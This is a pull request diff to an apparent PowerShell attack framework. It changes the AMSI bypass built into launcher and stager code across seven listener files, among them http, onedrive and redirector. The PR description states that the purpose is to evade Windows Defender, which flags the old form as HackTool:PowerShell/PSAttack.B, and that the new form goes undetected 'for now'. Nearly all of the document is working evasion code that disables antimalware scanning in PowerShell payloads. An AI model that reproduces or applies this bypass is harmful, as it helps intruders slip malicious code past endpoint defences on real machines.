### PR TITLE
minuscule change in bypassing amsi

### DIFF
--- a/lib/listeners/dbx.py
+++ b/lib/listeners/dbx.py
@@ -214,11 +214,11 @@ class Listener:
                     stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 
                     # @mattifestation's AMSI bypass
-                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
-                    stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
+                    stager += helpers.randomize_capitalization(');$Ref.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"
-                    stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+                    stager += helpers.randomize_capitalization(").SetValue($null,$true);")
                     stager += "};"
                     stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 

--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -300,11 +300,11 @@ class Listener:
                     stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 
                     # @mattifestation's AMSI bypass
-                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
-                    stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
+                    stager += helpers.randomize_capitalization(');$Ref.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"
-                    stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+                    stager += helpers.randomize_capitalization(").SetValue($null,$true);")
                     stager += "};"
                     stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 

--- a/lib/listeners/http_com.py
+++ b/lib/listeners/http_com.py
@@ -285,11 +285,11 @@ class Listener:
                     stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 
                     # @mattifestation's AMSI bypass
-                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
-                    stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
+                    stager += helpers.randomize_capitalization(');$Ref.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"
-                    stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+                    stager += helpers.randomize_capitalization(").SetValue($null,$true);")
                     stager += "};"
                     stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 

--- a/lib/listeners/http_foreign.py
+++ b/lib/listeners/http_foreign.py
@@ -182,11 +182,11 @@ class Listener:
                     stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 
                     # @mattifestation's AMSI bypass
-                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
-                    stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
+                    stager += helpers.randomize_capitalization(');$Ref.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"
-                    stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+                    stager += helpers.randomize_capitalization(").SetValue($null,$true);")
                     stager += "};"
                     stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 

--- a/lib/listeners/http_hop.py
+++ b/lib/listeners/http_hop.py
@@ -161,11 +161,11 @@ class Listener:
                     stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 
                     # @mattifestation's AMSI bypass
-                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
-                    stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
+                    stager += helpers.randomize_capitalization(');$Ref.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"
-                    stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+                    stager += helpers.randomize_capitalization(").SetValue($null,$true);")
                     stager += "};"
                     stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 

--- a/lib/listeners/onedrive.py
+++ b/lib/listeners/onedrive.py
@@ -209,11 +209,11 @@ class Listener:
                     launcher += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 
                     # @mattifestation's AMSI bypass
-                    launcher += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    launcher += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
                     launcher += "'System.Management.Automation.AmsiUtils'"
-                    launcher += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
+                    launcher += helpers.randomize_capitalization(');$Ref.GetField(')
                     launcher += "'amsiInitFailed','NonPublic,Static'"
-                    launcher += helpers.randomize_capitalization(").SetValue($null,$true)};")
+                    launcher += helpers.randomize_capitalization(").SetValue($null,$true);")
                     launcher += "};"
                     launcher += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 

--- a/lib/listeners/redirector.py
+++ b/lib/listeners/redirector.py
@@ -131,11 +131,11 @@ class Listener:
                     stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
 
                     # @mattifestation's AMSI bypass
-                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
-                    stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
+                    stager += helpers.randomize_capitalization(');$Ref.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"
-                    stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
+                    stager += helpers.randomize_capitalization(").SetValue($null,$true);")
                     stager += "};"
                     stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
 


### PR DESCRIPTION
which at time of writing does not…get detected by Defender yet, the original way flagged HackTool:PowerShell/PSAttack.B warning in windows Defender. New way raises no red flags (for now)